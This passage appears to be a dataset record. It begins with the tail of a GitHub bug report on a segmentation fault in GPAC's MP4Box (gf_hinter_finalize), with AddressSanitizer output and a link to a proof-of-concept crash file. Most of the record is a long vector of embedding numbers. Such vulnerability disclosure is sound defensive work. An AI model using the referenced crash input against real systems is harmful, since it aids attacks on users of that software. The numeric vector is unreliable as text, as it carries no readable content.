(/lib/x86_64-linux-gnu/libc.so.6+0x270b2) #5 0x5568f44852ad in _start (/home/lab4/src/gpac/bin/gcc/MP4Box+0x182ad) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV media_tools/isom_hinter.c:1249 in gf_hinter_finalize ==36074==ABORTING ``` Credit : ADLab of Venustech [poc_segv_isom_hinter.zip](https://github.com/gpac/gpac/files/6403881/poc_segv_isom_hinter.zip) --- end body ---
1,610
[ -0.02519048936665058, 0.027261976152658463, -0.002421144861727953, 0.007027179002761841, 0.013275660574436188, 0.0022245803847908974, -0.024918323382735252, 0.05149988457560539, -0.018340975046157837, 0.01828049309551716, -0.04185310751199722, 0.014334084466099739, 0.0344138965010643, -0.016738219186663628, 0.014583569951355457, 0.01880970597267151, -0.012376000173389912, 0.01257256418466568, -0.008482512086629868, -0.00272922171279788, 0.03120838664472103, -0.032992586493492126, -0.0337788425385952, 0.042911529541015625, -0.003233863040804863, 0.015407628379762173, -0.011370496824383736, 0.014477727003395557, -0.008338868618011475, 0.04415139928460121, -0.004959471989423037, 0.013918275013566017, 0.01408459898084402, -0.0012124624336138368, 0.04874798282980919, 0.011514140293002129, 0.048082686960697174, 0.07396871596574783, -0.014371884986758232, 0.01720694825053215, 0.007219963241368532, -0.04357682541012764, -0.03852663189172745, 0.01270108763128519, -0.004116513300687075, 0.024676397442817688, 0.014923777431249619, 0.006505527067929506, -0.04233695939183235, -0.0018862626748159528, 0.02429839037358761, -0.0045890239998698235, -0.014817935414612293, -0.059846311807632446, -0.007756735663861036, -0.04176238551735878, 0.024419352412223816, 0.01496913842856884, -0.0008207510691136122, 0.026248913258314133, -0.021289441734552383, 0.019747165963053703, -0.017539596185088158, 0.016329970210790634, 0.0025647880975157022, 0.012270157225430012, 0.008406910113990307, 0.017494235187768936, -0.014848175458610058, 0.042276475578546524, -0.003445548005402088, -0.05252806842327118, 0.016284609213471413, 0.02594650723040104, 0.0020903872791677713, -0.017721040174365044, 0.05146964266896248, 0.021213840693235397, -0.025704581290483475, 0.01853753998875618, -0.04702426493167877, 0.02940906584262848, -0.0239657424390316, 0.02652107924222946, 0.016481172293424606, -0.004384899046272039, -0.026717644184827805, -0.08648835867643356, -0.010085267946124077, -0.03740772604942322, 0.016753338277339935, 0.011967750266194344, 0.005443322937935591, 0.00024546930217184126, 0.009971865452826023, 0.017025504261255264, -0.0006426145555451512, -0.0076735736802220345, -0.04363730549812317, -0.010417915880680084, -0.03456510230898857, -0.05231638252735138, -0.0037328344769775867, 0.00024086232588160783, 0.003145031165331602, 0.030648933723568916, 0.031299106776714325, -0.02875889092683792, 0.012708647176623344, 0.13523633778095245, 0.010962247848510742, -0.0030902198050171137, 0.0037574050948023796, 0.00665673054754734, 0.011151252314448357, 0.022302504628896713, -0.015195943415164948, -0.029590509831905365, -0.044665489345788956, -0.02977195382118225, -0.017237190157175064, -0.03275066241621971, -0.01422824151813984, 0.007450548466295004, -0.010674961842596531, 0.0485665388405323, -0.005182497203350067, 0.005862912628799677, -0.031147904694080353, -0.001180331688374281, -0.03846615180373192, -0.019142352044582367, 0.0225897915661335, -0.010077707469463348, 0.013139577582478523, -0.014833055436611176, -0.009631657972931862, 0.02419254742562771, 0.009442653506994247, 0.03580496832728386, -0.08037973940372467, -0.02578018233180046, 0.03090597875416279, -0.017448874190449715, -0.0139333950355649, 0.004963252227753401, -0.0071708220057189465, 0.017781522125005722, -0.024358870461583138, -0.006108618341386318, -0.007280444726347923, -0.010848845355212688, 0.00340963713824749, 0.02242346666753292, 0.06350543349981308, 0.020427582785487175, 0.01794784516096115, 0.03099670074880123, 0.008565673604607582, -0.022514188662171364, 0.002869084943085909, -0.02541729435324669, 0.0163602102547884, -0.02339116856455803, -0.02897057496011257, -0.014069478027522564, 0.01505230087786913, 0.012020671740174294, 0.001289009116590023, 0.02578018233180046, -0.022030338644981384, 0.008618595078587532, 0.026702523231506348, 0.013252980075776577, -0.051016032695770264, -0.004963252227753401, 0.02839600294828415, 0.045996081084012985, -0.04188334569334984, 0.0023398729972541332, -0.012088713236153126, 0.008701756596565247, -0.00022633261687587947, -0.0066264900378882885, 0.023829659447073936, -0.03362764045596123, 0.03628882020711899, -0.037528689950704575, 0.03876855596899986, -0.012633046135306358, 0.017509356141090393, -0.002974927192553878, -0.00011204409383935854, 0.004339538048952818, 0.06356591731309891, -0.005182497203350067, -0.036621470004320145, -0.0162543673068285, -0.013555387035012245, -0.013910714536905289, -0.006210680585354567, -0.01758495718240738, -0.014817935414612293, 0.013865353539586067, -0.03190392255783081, 0.0020866072736680508, -0.015112781897187233, 0.042215995490550995, -0.0034153072629123926, -0.02290731854736805, -0.014817935414612293, -0.032145846635103226, 0.0286076869815588, -0.0017898704390972853, -0.00857323408126831, 0.003851907094940543, -0.025281211361289024, 0.008346429094672203, 0.007601751945912838, -0.010485957376658916, 0.0358956903219223, 0.006728552281856537, 0.016435811296105385, -0.015158142894506454, -0.025855785235762596, -0.020684627816081047, -0.002750012092292309, 0.016707977280020714, -0.0080742621794343, 0.012020671740174294, 0.023421410471200943, 0.0007021508645266294, 0.0038821478374302387, 0.016813820227980614, 0.011514140293002129, 0.013699029572308064, -0.0010055027669295669, 0.013116897083818913, 0.005549165420234203, 0.001804990810342133, -0.00809694267809391, 0.028683288022875786, -0.03275066241621971, -0.005885593127459288, 0.01720694825053215, 0.06114666163921356, -0.028365761041641235, -0.0069893780164420605, -0.01531690638512373, 0.023784298449754715, -0.007817217148840427, 0.006350543815642595, -0.008686636574566364, -0.013139577582478523, -0.0026403896044939756, 0.0006374169024638832, 0.0346255823969841, 0.008860520087182522, -0.0071670422330498695, -0.01613340526819229, 0.005394182167947292, -0.007847457192838192, -0.04832461476325989, -0.0059422943741083145, 0.004868749994784594, -0.026460599154233932, -0.014780133962631226, 0.01747911609709263, -0.011801427230238914, -0.010312072932720184, 0.006010335870087147, -0.017781522125005722, -0.032629698514938354, -0.02082071080803871, -0.020760228857398033, 0.004430260043591261, 0.01592171937227249, 0.011272215284407139, 0.01741863414645195, 0.000777280074544251, -0.0342022143304348, -0.0042223553173244, -0.007121681235730648, 0.02662692219018936, 0.017705921083688736, -0.011899708770215511, -0.0008750897832214832, 0.01094712782651186, -0.018764344975352287, 0.0006945907371118665, 0.04070395976305008, 0.0300894808024168, -0.059695109724998474, 0.03846615180373192, 0.02466127835214138, 0.020094934850931168, 0.0003317024966236204, 0.013441983610391617, -0.0011293005663901567, 0.005908273626118898, -0.011499020271003246, 0.01593684032559395, 0.009994545951485634, -0.007726494688540697, -0.03329499438405037, 0.017343033105134964, -0.032569218426942825, -0.0019486340461298823, -0.009601416997611523, 0.006312742829322815, 0.04009914770722389, -0.05149988457560539, -0.017600078135728836, -0.00342853763140738, -0.01678358018398285, -0.013736831024289131, -0.01049351692199707, -0.01158218178898096, -0.01583099737763405, 0.005602086894214153, -0.015967080369591713, 0.0050161732360720634, -0.0327204205095768, -0.011491459794342518, 0.01577051728963852, -0.000706875987816602, -0.014666731469333172, 0.03126886859536171, -0.06743672490119934, 0.029333462938666344, 0.004396239295601845, -0.021984977647662163, 0.0073484862223267555, -0.041580941528081894, 0.011113451793789864, -0.023875020444393158, -0.019414519891142845, 0.0027141014579683542, 0.021561607718467712, -0.007511029951274395, 0.0005807156558148563, 0.021561607718467712, 0.015211064368486404, 0.001529989647679031, -0.04197406768798828, -0.00809694267809391, 0.00857323408126831, -0.0035551704932004213, -0.011771186254918575, 0.022468827664852142, 0.0009091105894185603, 0.022468827664852142, 0.02060902677476406, 0.01870386302471161, 0.0032395331654697657, -0.01427360251545906, -0.002336092758923769, -0.020639266818761826, 0.01289009116590023, -0.008981483057141304, 0.03132934868335724, -0.03211560472846031, -0.00006940000457689166, -0.001329645048826933, -0.013736831024289131, 0.011045409366488457, -0.003027848433703184, -0.00643370533362031, -0.005072874948382378, -0.010213791392743587, -0.017343033105134964, 0.0483548529446125, -0.03329499438405037, 0.013396622613072395, 0.0011264655040577054, -0.0300894808024168, 0.024903202429413795, 0.024101825430989265, -0.0239657424390316, 0.00958629697561264, -0.04121805354952812, 0.022771235555410385, 0.02178841270506382, -0.05618719011545181, 0.018401456996798515, 0.014734772965312004, -0.0285018440335989, 0.046661376953125, -0.03767989203333855, -0.024479834362864494, -0.0358956903219223, 0.04076444357633591, -0.056761763989925385, -0.06477554142475128, -0.009949184954166412, 0.017705921083688736, -0.032690178602933884, -0.006127518601715565, 0.019701804965734482, -0.048445574939250946, 0.04167166352272034, -0.0021187379024922848, 0.014470167458057404, 0.010039906948804855, -0.01049351692199707, 0.03338571637868881, 0.02594650723040104, -0.001495968783274293, 0.0225897915661335, -0.006686971057206392, 0.01826537400484085, -0.018340975046157837, -0.01158218178898096, -0.0012256926856935024, 0.041732143610715866, 0.018734103068709373, -0.008535432629287243, 0.006702091544866562, -0.05540093407034874, 0.05503804609179497, -0.01927843689918518, -0.01853753998875618, 0.004967032466083765, 0.013071536086499691, 0.03628882020711899, 0.027337579056620598, 0.0036213218700140715, 0.017010385170578957, 0.03513967618346214, -0.027851669117808342, 0.0009587241802364588, -0.006550888065248728, 0.004377339035272598, 0.0003895850677508861, 0.00857323408126831, -0.03510943427681923, -0.027715586125850677, -0.03988746181130409, -0.002319082384929061, -0.0074392082169651985, -0.039070963859558105, 0.02695957012474537, -0.00958629697561264, -0.0024929663632065058, 0.03341595456004143, -0.04895966872572899, -0.02130456268787384, -0.02141040377318859, 0.024676397442817688, -0.004664625506848097, -0.0029503568075597286, 0.04058299958705902, 0.02269563265144825, -0.014145080000162125, 0.00809694267809391, 0.001738839317113161, 0.008301068097352982, 0.004388679284602404, 0.05056242272257805, 0.02748878113925457, -0.011393177323043346, 0.008013781160116196, 0.006853295024484396, -0.005855352617800236, 0.03477678820490837, 0.035018712282180786, -0.023844778537750244, -0.010236471891403198, 0.004290396813303232, -0.011400737799704075, 0.01817465014755726, 0.009102446027100086, 0.018522419035434723, 0.0009724270203150809, -0.017978087067604065, 0.027050292119383812, -0.0010820494499057531, -0.00914024654775858, -0.01332102157175541, -0.04714522510766983, -0.001496913842856884, 0.006354323588311672, -0.003411527257412672, 0.03365788236260414, -0.005118235945701599, -0.01129489578306675, -0.017645439133048058, -0.017766401171684265, 0.012081153690814972, 0.007817217148840427, 0.028849612921476364, 0.01982276886701584, -0.006070817355066538, -0.028002873063087463, 0.01870386302471161, -0.0037385046016424894, -0.021818652749061584, 0.007847457192838192, 0.03604689612984657, 0.020427582785487175, 0.00009048579522641376, -0.034655824303627014, -0.01049351692199707, 0.02130456268787384, 0.0292427409440279, -0.04000842571258545, -0.0286076869815588, 0.04336513951420784, -0.0014458827208727598, -0.01168802473694086, -0.018567780032753944, -0.028637927025556564, 0.004997272975742817, -0.04862701892852783, -0.008414470590651035, -0.021380163729190826, 0.014636491425335407, 0.000848629220854491, 0.019248194992542267, 0.01874922402203083, -0.0017152137588709593, -0.008263266645371914, -0.01323785912245512, 0.03099670074880123, 0.02541729435324669, 0.01465161144733429, -0.0011992320651188493, 0.0065093073062598705, 0.024691518396139145, -0.013404183089733124, -0.009654338471591473, -0.012806929647922516, -0.008686636574566364, 0.01693478226661682, -0.01790248416364193, -0.0030259585473686457, -0.000178845293703489, 0.027156135067343712, -0.0040900525636971, -0.022982919588685036, -0.024918323382735252, 0.05077410861849785, -0.027473662048578262, 0.019096991047263145, -0.03031628578901291, 0.03916168585419655, -0.010553998872637749, 0.036258578300476074, -0.021606968715786934, -0.00021700053184758872, 0.003560840617865324, 0.006399684585630894, -0.0009960525203496218, 0.02231762558221817, 0.00431307777762413, 0.0041769943200051785, -0.01507498137652874, 0.024207668378949165, 0.025825543329119682, 0.027080532163381577, 0.010032346472144127, 0.011136132292449474, -0.01264816615730524, -0.036954116076231, -0.008731997571885586, -0.0018305063713341951, -0.0024060243740677834, 0.02520561031997204, -0.029817314818501472, -0.009442653506994247, 0.005394182167947292, 0.0069629172794520855, 0.0318736806511879, -0.013419303111732006, -0.010168430395424366, 0.005329920444637537, -0.0007588521693833172, -0.009782860986888409, -0.015861239284276962, -0.030558211728930473, 0.016314849257469177, -0.036681950092315674, -0.023905260488390923, 0.007223743479698896, 0.013222739100456238, -0.01756983809173107, 0.005299679934978485, 0.008361549116671085, -0.0092914504930377, 0.0059914356097579, -0.01923307590186596, 0.003092109924182296, -0.005216517951339483, -0.019248194992542267, 0.006830614525824785, -0.009223408997058868, 0.017705921083688736, 0.020911432802677155, -0.0007777526043355465, -0.002602588851004839, -0.03580496832728386, 0.04372802749276161, -0.014757453463971615, -0.030648933723568916, -0.02780630812048912, 0.016481172293424606, 0.02812383696436882, -0.00316204153932631, -0.01929355598986149, 0.05283047631382942, 0.0030316286720335484, 0.029575388878583908, 0.04049227759242058, -0.012988373637199402, 0.006520647555589676, -0.007185942493379116, 0.03792181611061096, 0.016707977280020714, 0.015430308878421783, 0.01369147002696991, 0.013593187555670738, -0.035774730145931244, 0.0231190025806427, -0.01997397094964981, 0.007057419512420893, 0.04303249344229698, -0.008172544650733471, -0.03858711197972298, 0.00030335187329910696, -0.020805589854717255, -0.029046177864074707, 0.02508464641869068, -0.007246423978358507, -0.03202488273382187, -0.022861957550048828, 0.01944475993514061, 0.03777061402797699, -0.0017993206856772304, -0.019399398937821388, -0.019112112000584602, -0.0017747501842677593, -0.0007078209891915321, -0.028683288022875786, -0.00247784610837698, -0.028637927025556564, -0.004778028000146151, 0.0300894808024168, -0.023557493463158607, -0.003867027349770069, 0.020231017842888832, -0.03380908444523811, -0.020094934850931168, 0.005341260693967342, 0.013071536086499691, 0.029015935957431793, -0.012716207653284073, 0.048989906907081604, 0.041036609560251236, 0.007030959241092205, -0.02029149979352951, 0.0048347292467951775, -0.051530126482248306, -0.010939567349851131, -0.00021085789194330573, -0.006751232780516148, 0.0025912486016750336, -0.012504522688686848, -0.011113451793789864, 0.004316857550293207, -0.002060146536678076, -0.002819943707436323, -0.020125174894928932, 0.023194605484604836, -0.00332836527377367, 0.007658453192561865, -0.0183712150901556, -0.004728886764496565, 0.006017895881086588, -0.02428326942026615, 0.0025836883578449488, 0.013630988076329231, 0.010735442861914635, 0.0015091991517692804, 0.007099000737071037, -0.0232248455286026, 0.006830614525824785, -0.00033453755895607173, -0.019354037940502167, -0.023935500532388687, -0.03719604015350342, 0.012481842190027237, 0.0017445094417780638, 0.013744390569627285, 0.038496389985084534, 0.0004885760718025267, -0.03719604015350342, 0.012186995707452297, -0.008384229615330696, -0.012882531620562077, -0.006959137506783009, -0.024041343480348587, 0.020896311849355698, 0.004033351317048073, -0.025432415306568146, 0.02509976737201214, 0.019626203924417496, -0.005980095360428095, -0.011952630244195461, 0.018552659079432487, -0.014462606981396675, -0.013222739100456238, 0.029650989919900894, -0.024116944521665573, 0.015256425365805626, -0.0022245803847908974, -0.0335671603679657, -0.005292119923979044, -0.017191829159855843, -0.0066000293008983135, 0.01891554705798626, -0.014757453463971615, -0.004373558796942234, -0.031178144738078117, -0.025266092270612717, 0.0021773292683064938, -0.013487344607710838, 0.019308676943182945, 0.024540314450860023, -0.006845735013484955, 0.012020671740174294, -0.02744342014193535, -0.0348372682929039, 0.0013929614797234535, 0.015891479328274727, 0.006373224314302206, -0.017978087067604065, -0.0025591179728507996, -0.010009665973484516, 0.002808603458106518, 0.020805589854717255, -0.002736781956627965, -0.009661898948252201, 0.002472175983712077, -0.030860617756843567, 0.009382172487676144, -0.014591130428016186, 0.010508637875318527, 0.003519259626045823, -0.024706639349460602, 0.010138189420104027, 0.013222739100456238, 0.03910120576620102, 0.020850950852036476, -0.03317403048276901, -0.018734103068709373, -0.013759511522948742, 0.027413180097937584, -0.0035797408781945705, 0.0005173992249183357, -0.031571272760629654, 0.009964304976165295, 0.007960859686136246, 0.007779416162520647, 0.01260280515998602, -0.021228959783911705, -0.013305900618433952, 0.005443322937935591, -0.014160200022161007, 0.02816919796168804, -0.009276329539716244, 0.020170535892248154, -0.009835782460868359, -0.01047083642333746, -0.002785922959446907, 0.02759462408721447, -0.042215995490550995, 0.0026744105853140354, 0.030013877898454666, 0.014583569951355457, 0.0013419303577393293, -0.041369255632162094, 0.005881812889128923, -0.04176238551735878, 0.009593856520950794, 0.015143022872507572, -0.0171011071652174, 0.019217954948544502, -0.015740275382995605, 0.0003588718536775559, -0.0163602102547884, 0.01491621695458889, 0.004241256043314934, 0.038435909897089005, -0.015543711371719837, -0.016224127262830734, -0.026551321148872375, -0.00036572327371686697, 0.008905881084501743, -0.006029236130416393, -0.03046748973429203, 0.019520360976457596, 0.013895594514906406, -0.00613885885104537, -0.04100636765360832, -0.019626203924417496, -0.023905260488390923, -0.03211560472846031, 0.01566467434167862, -0.01997397094964981, 0.012769129127264023, -0.0022189102601259947, 0.010501077398657799, 0.023784298449754715, -0.0074392082169651985, 0.01059935986995697, -0.0056209871545434, 0.0116124227643013, -0.010901766829192638, -0.007722714450210333, 0.02316436357796192, -0.01425092201679945, 0.009608977474272251, 0.018930668011307716, -0.04288129135966301, 0.03154103457927704, -0.028199438005685806, 0.010622040368616581, 0.02125920169055462, 0.024525195360183716, 0.014266042970120907, -0.013812432065606117, 0.0013362602330744267, -0.016949903219938278, 0.0009332086192443967, 0.0035116993822157383, 0.040613237768411636, -0.013744390569627285, 0.011914829723536968, -0.029439305886626244, 0.04145997762680054, -0.045088861137628555, -0.00908732507377863, -0.0163602102547884, -0.030830377712845802, -0.008028901182115078, -0.04149021953344345, -0.012958132661879063, -0.015679795295000076, 0.011128571815788746, 0.007892818190157413, 0.018658502027392387, 0.01800832711160183, -0.008044022135436535, 0.03341595456004143, -0.01502205990254879, 0.022121060639619827, 0.004838509485125542, -0.009790421463549137, 0.032690178602933884, -0.024207668378949165, 0.027821429073810577, 0.01049351692199707, -0.01222479622811079, 0.00038485994446091354, -0.004558783024549484, -0.008301068097352982, -0.007628212682902813, -0.0432744175195694, 0.0008448490989394486, -0.007681133691221476, -0.014364324510097504, -0.006747452542185783, -0.004396239295601845, 0.013789751566946507, -0.025175370275974274, -0.00733714597299695, -0.0088151590898633, -0.0036421124823391438, -0.0178420040756464, 0.014001436531543732, -0.0068721952848136425, 0.01593684032559395, -0.0337788425385952, 0.009178047999739647, 0.015468109399080276, -0.014409685507416725, 0.002472175983712077, -0.03126886859536171, -0.047387152910232544, 0.010342313908040524, 0.005541605409234762, -0.025598738342523575, -0.031087422743439674, -0.00457012327387929, 0.033899806439876556, 0.05854596570134163, -0.00007353447290370241, -0.026460599154233932, -0.015309345908463001, -0.006259821355342865, -0.014099719002842903, 0.0014912437181919813, 0.002570458222180605, 0.000003281734279880766, -0.02706541121006012, -0.002003445290029049, 0.03278090059757233, 0.005636107642203569, -0.015891479328274727, 0.01779664307832718, 0.0037876456044614315, 0.022332744672894478, -0.02269563265144825, -0.048022206872701645, -0.022347865626215935, -0.024752000346779823, -0.0350489541888237, 0.015619313344359398, -0.0021584287751466036, 0.04705450311303139, 0.009412412531673908, -0.005367721430957317, -0.0038897080812603235, 0.03163175657391548, -0.0048952107317745686, -0.011158812791109085, -0.0230131596326828, 0.023950621485710144, -0.0065357680432498455, 0.03510943427681923, -0.003950189333409071, -0.013124456629157066, -0.019429638981819153, 0.017131347209215164, 0.031117664650082588, -0.007681133691221476, -0.014190440997481346, -0.01997397094964981, 0.0011954520596191287, -0.049413278698921204, -0.0013854013523086905, 0.02316436357796192, 0.019520360976457596, 0.0016339420108124614, -0.00951069500297308, 0.03341595456004143, -0.0022548208944499493, -0.018507298082113266, -0.009019283577799797, -0.04233695939183235, -0.019202833995223045, -0.02451007440686226, -0.03067917376756668, -0.011325135827064514, -0.01853753998875618, 0.004388679284602404, -0.022620031610131264, -0.0037611851003021, -0.036621470004320145, 0.012179435230791569, 0.02529633231461048, 0.035018712282180786, -0.007756735663861036, -0.01817465014755726, 0.023738937452435493, 0.0020733769051730633, -0.04100636765360832, 0.010024786926805973, -0.008936122059822083, -0.024903202429413795, 0.0038462369702756405, -0.010765683837234974, 0.014288723468780518, 0.04765931889414787, -0.009359491989016533, 0.030452368780970573, -0.0019165033008903265, -0.015294225886464119, -0.010591799393296242, 0.004638164769858122, 0.00010790962551254779, -0.012376000173389912, 0.037800855934619904, -0.017222069203853607, -0.0185829009860754, -0.02685372717678547, -0.005723049398511648, 0.026218673214316368, -0.030119720846414566, -0.004226135555654764, 0.019671564921736717, 0.0231190025806427, 0.025054406374692917, -0.049897126853466034, 0.02903105691075325, 0.024857841432094574, 0.002237810520455241, -0.032992586493492126, -0.018930668011307716, -0.03190392255783081, -0.023239966481924057, -0.02168256975710392, 0.003819776466116309, 0.0162543673068285, -0.026037229225039482, 0.0033453756477683783, 0.005632327403873205, 0.026127951219677925, -0.02742830105125904, 0.0007687748875468969, -0.011650223284959793, 0.004426480270922184, 0.00958629697561264, -0.01811417005956173, -0.013252980075776577, -0.013200058601796627, -0.03634930029511452, 0.03323451057076454, 0.010939567349851131, 0.04563319310545921, -0.020064692944288254, 0.0009341536206193268, -0.02130456268787384, -0.008482512086629868, 0.01062960084527731, 0.04251840338110924, -0.005772190634161234, 0.006297622341662645, 0.021213840693235397, 0.024540314450860023, 0.009994545951485634, 0.011098330840468407, 0.012050912715494633, 0.007688693702220917, -0.009404852986335754, -0.004687306005507708, 0.005201397463679314, -0.017191829159855843, -0.032357532531023026, 0.008588354103267193, 0.03910120576620102, 0.007817217148840427, -0.04006890580058098, -0.019671564921736717, -0.012391120195388794, 0.02493344433605671, 0.018764344975352287, 0.015211064368486404, -0.007393847219645977, -0.029756832867860794, 0.02434375137090683, -0.013479785062372684, 0.05497756227850914, -0.026944449171423912, -0.007991100661456585, -0.005227858200669289, -0.0013693359214812517, -0.002419254742562771, 0.0025250972248613834, -0.023421410471200943, -0.010667401365935802, -0.01592171937227249, 0.010024786926805973, -0.033990528434515, -0.019142352044582367, -0.03622834011912346, 0.002279391512274742, -0.006188000086694956, 0.0042223553173244, 0.010153309442102909, 0.0029673671815544367, 0.004131633322685957, -0.018779464066028595, -0.011975310742855072, 0.02898569591343403, -0.019853008911013603, 0.004532322287559509, -0.021002154797315598, -0.004785588011145592, -0.009813101962208748, -0.0037290542386472225, -0.02136504277586937, -0.010039906948804855, 0.029635870829224586, -0.046268247067928314, 0.015513471327722073, -0.00006981345359236002, -0.02280147559940815, 0.018870186060667038, 0.004245035815984011, -0.018461937084794044, -0.03142007067799568, 0.013124456629157066, -0.029817314818501472, -0.021107997745275497, 0.0010244031436741352, 0.011763625778257847, 0.060330163687467575, 0.012633046135306358, -0.010758123360574245, -0.019036510959267616, 0.002785922959446907, -0.0001144066482083872, 0.008021341636776924, 0.011226854287087917, 0.003146921284496784, 0.010312072932720184, 0.030074359849095345, -0.013963636010885239, 0.0013948515988886356, 0.003670463105663657, 0.014258482493460178, 0.024494953453540802, -0.016269488260149956, -0.011672903783619404, -0.0003139833570457995, 0.007495909463614225, 0.003953969571739435, 0.019580842927098274, 0.029802193865180016, -0.01581587828695774, 0.023950621485710144, -0.022937558591365814, 0.009359491989016533, -0.040310829877853394, -0.028320400044322014, -0.006441265810281038, -0.004120293073356152, -0.004142973572015762, -0.01192994974553585, 0.008989043533802032, 0.02540217526257038, -0.025749942287802696, 0.01752447709441185, -0.010138189420104027, -0.006297622341662645, -0.029046177864074707, 0.012504522688686848, 0.008051581680774689, -0.013200058601796627, -0.01505230087786913, 0.0035135895013809204, -0.041792623698711395, 0.029272982850670815, 0.005122015718370676, -0.011952630244195461, -0.017297672107815742, 0.006668070796877146, -0.03275066241621971, 0.01923307590186596, 0.03628882020711899, -0.002753792330622673, 0.0061501991003751755, -0.002419254742562771, -0.0005268494132906199, -0.01602756232023239, -0.017978087067604065, -0.00948045402765274, 0.018976029008626938, -0.004218575544655323, 0.004468061029911041, 0.016072923317551613, -0.033899806439876556, -0.01811417005956173, -0.0018749224254861474, 0.004483181517571211, 0.01794784516096115, 0.01992860995233059, -0.013147137127816677, 0.012353319674730301, -0.01849217899143696, 0.006641610059887171, 0.028154077008366585, -0.014734772965312004, 0.010070147924125195, -0.033204272389411926, -0.018083928152918816, 0.019474999979138374, 0.02392038144171238, -0.0017577398102730513, 0.02227226458489895, -0.018099049106240273, 0.025387054309248924, -0.005568066146224737, -0.0031658215448260307, 0.0020110055338591337, -0.004411359783262014, 0.003311354899778962, 0.016496293246746063, 0.013517585583031178, 0.008505192585289478, 0.002392794005572796, 0.036954116076231, -0.005390401929616928, -0.022453708574175835, -0.012633046135306358, -0.0027235515881329775, 0.029000815004110336, -0.010357433930039406, 0.0316619947552681, 0.00528833968564868, -0.003160151420161128, 0.010591799393296242, 0.020110053941607475, 0.0011151252547279, 0.00985846295952797, 0.014545769430696964, -0.05370745435357094, -0.020155414938926697, -0.005889373365789652, -0.02413206547498703, -0.01874922402203083, 0.00809694267809391, 0.0015923610189929605, -0.0023814537562429905, -0.0003612344153225422, -0.019429638981819153, -0.016965024173259735, -0.012852290645241737, 0.021123116835951805, -0.017010385170578957, -0.004324418026953936, 0.009117566049098969, -0.011105891317129135, -0.017917605116963387, 0.039010483771562576, 0.03650050610303879, 0.023134123533964157, 0.015271545387804508, -0.016375331208109856, -0.009745060466229916, 0.029227621853351593, -0.042215995490550995, 0.014538208954036236, 0.012050912715494633, 0.0038897080812603235, -0.0030750995501875877, -0.01465161144733429, 0.016118284314870834, 0.03952457383275032, 0.017826883122324944, 0.014024117030203342, -0.00407493207603693, 0.02098703384399414, 0.003957749344408512, 0.010402794927358627, 0.017297672107815742, 0.008323748596012592, -0.016874302178621292, -0.0016887531382963061, 0.04058299958705902, 0.002937126439064741, -0.0037044838536530733, 0.005095555447041988, -0.029908036813139915, -0.006282502319663763, 0.008822719566524029, -0.0031960622873157263, 0.03686339408159256, 0.01720694825053215, -0.0066907512955367565, 0.005677688401192427, 0.027035171166062355, 0.003335925517603755, -0.026082590222358704, -0.019399398937821388, -0.03341595456004143, 0.018189771100878716, 0.004003110341727734, -0.003857577219605446, 0.005197617691010237, 0.004649505019187927, 0.032508734613657, -0.008308627642691135, -0.010501077398657799, 0.015437869355082512, -0.03205512464046478, -0.009117566049098969, 0.04357682541012764, 0.007238863501697779, -0.002903105691075325, 0.02940906584262848, -0.018900427967309952, 0.012368439696729183, 0.0017823103116825223, -0.025447536259889603, 0.016496293246746063, 0.020866071805357933, 0.04034107178449631, -0.023466771468520164, -0.013630988076329231, -0.008323748596012592, -0.015400067903101444, -0.015059860423207283, -0.017327912151813507, -0.011914829723536968, 0.02003445290029049, -0.00735226646065712, -0.016118284314870834, -0.018416576087474823, 0.014560889452695847, -0.0005481123807840049, -0.0292427409440279, -0.0060065556317567825, -0.006320302840322256, -0.010372554883360863, -0.01731279119849205, -0.02854720503091812, -0.0013693359214812517, 0.021032394841313362, 0.01961108297109604, 0.007405187468975782, 0.0070763202384114265, 0.012383559718728065, -0.006411024834960699, 0.002785922959446907, 0.03538160026073456, -0.024842722341418266, 0.017176708206534386, 0.011627542786300182, -0.00842203013598919, -0.014447486959397793, -0.0053374809212982655, 0.025311453267931938, -0.014734772965312004, -0.0022510408889502287, -0.004426480270922184, 0.01422824151813984, 0.0061237383633852005, 0.009782860986888409, 0.013132017105817795, -0.01096980832517147, 0.0020317959133535624, -0.0027405619621276855, 0.007390066981315613, 0.00495569221675396, -0.018885307013988495, 0.00014813209418207407, 0.007359826471656561, -0.020911432802677155, 0.009692138992249966, -0.02157672867178917, -0.0003465866029728204, 0.005322360433638096, 0.019535481929779053, -0.013177378103137016, 0.033536918461322784, -0.02466127835214138, 0.023194605484604836, -0.013502465561032295, -0.019853008911013603, -0.0010990598239004612, 0.026354756206274033, 0.011468779295682907, -0.00490277074277401, 0.005696588661521673, 0.014696972444653511, -0.003798985853791237, -0.01462137047201395, -0.005896933376789093, 0.007356046233326197, -0.015347147360444069, 0.02029149979352951, 0.008308627642691135, -0.008301068097352982, 0.0035495003685355186, 0.004505862016230822, -0.0013608307344838977, 0.0033642761409282684, 0.023663334548473358, -0.009276329539716244, -0.026702523231506348, 0.008505192585289478, -0.005598306655883789, -0.009654338471591473, -0.017070865258574486, 0.004774247761815786, -0.000006629915787925711, 0.06302158534526825, 0.005110675469040871, 0.005352600943297148, -0.003568400628864765, -0.005409302189946175, -0.029711471870541573, -0.01965644396841526, -0.014387005008757114, -0.010372554883360863, 0.004207235295325518, 0.02897057496011257, -0.011415857821702957, -0.008044022135436535, 0.010289392434060574, -0.01874922402203083, -0.012451601214706898, 0.04880846291780472, -0.00019609193259384483, 0.0033037946559488773, 0.029061296954751015, 0.028275039047002792, 0.03707507997751236, 0.018099049106240273, 0.005004832986742258, 0.012716207653284073, -0.017600078135728836, -0.0008259486639872193, -0.0018739773659035563, 0.0035305998753756285, 0.007461888715624809, -0.019580842927098274, -0.017539596185088158, -0.02280147559940815, 0.023088762536644936, 0.008142304606735706, -0.002162209013476968, 0.01049351692199707, 0.0010943347588181496, 0.010289392434060574, 0.0034379877615720034, 0.002770802704617381, -0.022242022678256035, -0.02839600294828415, 0.0011463109403848648, -0.009299010038375854, -0.005386621691286564, -0.0024494954850524664, 0.003850016975775361, -0.022771235555410385, 0.01655677519738674, 0.02599186822772026, 0.03825446590781212, -0.016587015241384506, 0.005390401929616928, -0.0016112613957375288, -0.0020695968996733427, 0.016314849257469177, -0.0021111776586622, 0.0007919279159978032, -0.03580496832728386, 0.03894999995827675, -0.01682894118130207, -0.006947797257453203, 0.022514188662171364, 0.009850902482867241, -0.00010170792666031048, 0.010712762363255024, -0.00704229949042201, -0.024797361344099045, -0.01790248416364193, -0.02092655375599861, -0.002285061636939645, 0.005681468639522791, 0.004951911978423595, 0.014371884986758232, 0.010425475426018238, -0.0092914504930377, 0.00403713108971715, -0.017660560086369514, -0.0162543673068285, 0.013797312043607235, 